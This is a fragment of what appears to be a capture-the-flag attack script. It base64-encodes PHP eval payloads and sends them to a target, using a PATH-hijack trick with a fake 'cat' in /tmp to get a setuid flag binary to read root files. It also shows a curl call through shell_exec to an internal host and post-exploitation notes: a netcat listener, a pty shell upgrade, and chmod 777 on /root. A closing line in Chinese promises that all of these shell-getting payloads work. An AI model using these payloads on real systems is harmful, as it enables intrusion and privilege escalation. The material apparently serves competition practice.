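    pwn_shell_getflag = """pwn('echo "nl /root/you_win||echo" > /tmp/cat ; chmod 777 /tmp/cat ; export PATH=/tmp:$PATH ; /getflag ;');"""
    # Variant C: a plain command, e.g. pwn('echo $PATH');
    pwn_shell = pwn_shell_getflag
    runPHP_eval_second_bypass(url, base64.b64encode(pwn_shell.encode()), net_id)

    # Read back the file dropped on the second host:
    # phpPayload = f"echo shell_exec('curl \"http://172.2.{net_id}.5:80/public../tmp/newfile.txt\"');"
    # runPHPshell_first(url, base64.b64encode(phpPayload.encode()))

# Post-exploitation notes (run from the reverse shell):
#   find /tmp/ -type f -name "*flag"|xargs sed -i "s#FLAG665# root/*FLAG665#g"
#   nc -lvnp 2333
#   python3 -c "import pty; pty.spawn('/bin/bash')"
#   cd /tmp && echo "bash chmod 777 -R /root||echo" > cat && chmod 777 cat && export PATH=/tmp:$PATH && /getflag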

都是用来拿各种shell的,有点乱,但保证都能用哈
